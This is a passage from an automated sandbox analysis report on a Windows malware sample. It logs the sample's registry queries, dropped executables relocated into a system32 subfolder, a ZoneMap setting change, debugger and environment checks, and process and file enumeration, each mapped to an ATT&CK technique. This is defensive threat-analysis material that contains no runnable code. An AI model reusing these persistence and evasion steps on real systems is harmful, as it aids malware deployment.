\"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORDISPLAY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEFOLDERVERBS\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"USEDROPHANDLER\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORPARSING\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSPARSEDISPLAYNAME\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"QUERYFOROVERLAY\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"MAPNETDRIVEVERBS\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"QUERYFORINFOTIP\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEINWEBVIEW\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEONDESKTOPPERUSER\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSALIASEDNOTIFICATIONS\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSUNIVERSALDELEGATE\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"NOFILEFOLDERJUNCTION\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"PINTONAMESPACETREE\"; Value: \"\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HASNAVIGATIONENUM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"qoxyhdso.exe.67EE4A71.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"qoxyhdso.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\qoxyhdso.exe]- [targetUID: 00000000-00005996]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67EE53F7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\qoxyhdso.exe\" to \"%WINDIR%\\system32\\yucmtnpt\\qoxyhdso.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"sc.exe\" queried SystemProcessInformation at 00000000-00006024-00000105-364919 [PID: 6024]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-355084 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-1095788 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-2875110 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-3530555 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-4021884 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-4265068 [PID: 3080]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003080-00000105-5630980 [PID: 3080]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003960-00000105-90838 [PID: 3960]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F540000\n \"qoxyhdso.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F540000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F540000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00003080-00000105-8293761", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" queries volume information of \"C:\\\" at 00000000-00005996-0000010C-1773282\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" queries volume information of \"C:\\\" at 00000000-00005996-0000010C-1774498\n \"qoxyhdso.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1450412\n \"qoxyhdso.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1452261\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-42097\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-845795\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-1763307\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-1765087", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000c0a728003cfc2400145c1c77435c1c7708fd2400010000009401260001000000bcfb2400935c1d7740832477d4a01c7786d60f7708fd24000100000001000000e0ff2800000000008cfb2400bcfb240028fc240095e11877c2293700feffffffd4a01c771bbe0b7500009f7500000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c1b7743790b75ffffffff0c0000004c621b771f790b75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e150000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea3277ecf91200b3442c6a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b4000e83772b6bcf51200616b400088000000f822410081a83277ecf9120000009001006edc000002000008000000632e5d00 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebd775f81e2e0000d0fd7f9a5c1d7700e0fd7fb0c9720144d0fd7f00000000400000003f0000002500000000d0fd7fa4c97201c15c1d77608224772500000000d0fd7f9a5c1d7700e0fd7fc8c9720157891c778083247713170c75d8ebd775 (UID: 00000000-00005996)\n \"qoxyhdso.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c1b7743790b75ffffffff0c0000004c621b771f790b75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e330000000000 (UID: 00000000-00004252)\n \"netsh.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" queries volume information of \"C:\\\" at 00000000-00005996-0000010C-1773282\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" queries volume information of \"C:\\\" at 00000000-00005996-0000010C-1774498\n \"qoxyhdso.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1450412\n \"qoxyhdso.exe\" queries volume information of \"C:\\\" at 00000000-00004252-0000010C-1452261\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-42097\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-845795\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-1763307\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003960-0000010C-1765087", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00003960)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000e8001c020000000000000000000000000000000000000500e3001c0200000000000000000000087026000000000020000000000000000000000078492800f86c2600186e2600b8c82800c071260000000000ccf924000000000028fc240095e118772a313700feffffffff2b1c779a2a1c7764c5a475b69f1c77000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c5a475b8c8280064c5a475 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e6c00fce2120080f40c7700006c000000000089f40c77843f0ab60200000070e312006ce3120064e2120068e2120018e4120095e118772a313700c0e21200c83a167734e31200d58c0e7770e3120004e3120042a40c77a802167744e31200d2f40c77080000006ef50c7744f50c773c3e0ab60200000070aa546f0000130026bb546f18e31200020000000000130070aa546f48e3120042a40c77a80216778ce3120010a9546f08000000e6a8546f80177ab40200000070aa546f0000130026bb546fac0e6c00780e6c0058e312008050606f18e41200f9f2586fe45c3cdb (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000faeed43e0300000044e57201082612b7c81600008ce57201c0e47201590000000300000048e4720150e4720118e67201d0bb2d6a3c524fdcfeffffff98e57201bfe52c6afaeed43e98e57201cce52c6a060000000000356a01000000dfe52c6a3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e57201000000008e00000044e67201feffffffcce57201cf001d77d6001d77f6c859768e0000004700000044e6720100000000a0e572010000000008e67201 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360069d56ab544de72016d82cc764c712e0004010000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000360030003100340031003100390034006300340038003700310031003900650039003200650039006500650061003400300034003200610033006500330035003400380038006100620037003000320062006100660037003800660032003600360033002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b1c77cae55976d8ebd775ac0126000000260000000000000000000300ed00c9000000000000000000000000000000000000000400e800c900000000000000000000000870260000000000200000000000000000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000260000f13000000000003e00003e340000c028f330003007310028972e00f0010000000026000400000000f13000acee720104641c7738012600e0631c7796c35976000000000000260008f130006dd1327750a66bb76cae51750000000000000000f401000030073100d82f26000100000000002600500126000c00000008f13000d82f2600020000021800000017210036820000000000000000000000030000004cee7201820000007f070000000000001721003602000000c0753a773007310000000000c0753a7768ee7201e830260000000000d82f2600c0ee7201ff2b1c77 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000007b7262e40300000044e57201082612b7541700008ce57201c0e472015b0000000300000048e4720150e4720118e67201d0bb2d6a3c524fdcfeffffff98e57201bfe52c6a7b7262e498e57201cce52c6a820500000000356a01000000dfe52c6a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002600a8fa2d000000000098000098340000c0d0fc2d0060113100385b2e00c00000000000260000000010a8fa2d00acee720104641c7738012600e0631c7796c359760000000000002600b0fa2d006dd1327750a66bb76cae51750000000000000000e000000060113100d82f26000100000000002600500126000c000000b0fa2d00d82f26000200000218000000aa0100abdc0000000000000000000000030000004cee7201dc0000002a01000000000000a32c008f5c000000c0753a77d0ba310000000000c0753a7768ee72012030260000000000d82f2600c0ee7201ff2b1c77 (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000008984dde0300000044e57201082612b77c1600008ce57201c0e472015b0000000300000048e4720150e4720118e67201d0bb2d6a3c524fdcfeffffff98e57201bfe52c6a08984dde98e57201cce52c6a820500000000356a01000000dfe52c6a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"IsWow64Process\" with parameter \"5996\" - (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00004252-34677-273-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"qoxyhdso.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005996)\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005996)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"870b052420242560141194c487119e92e9eea4042a3e35488ab702baf78f2663.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters 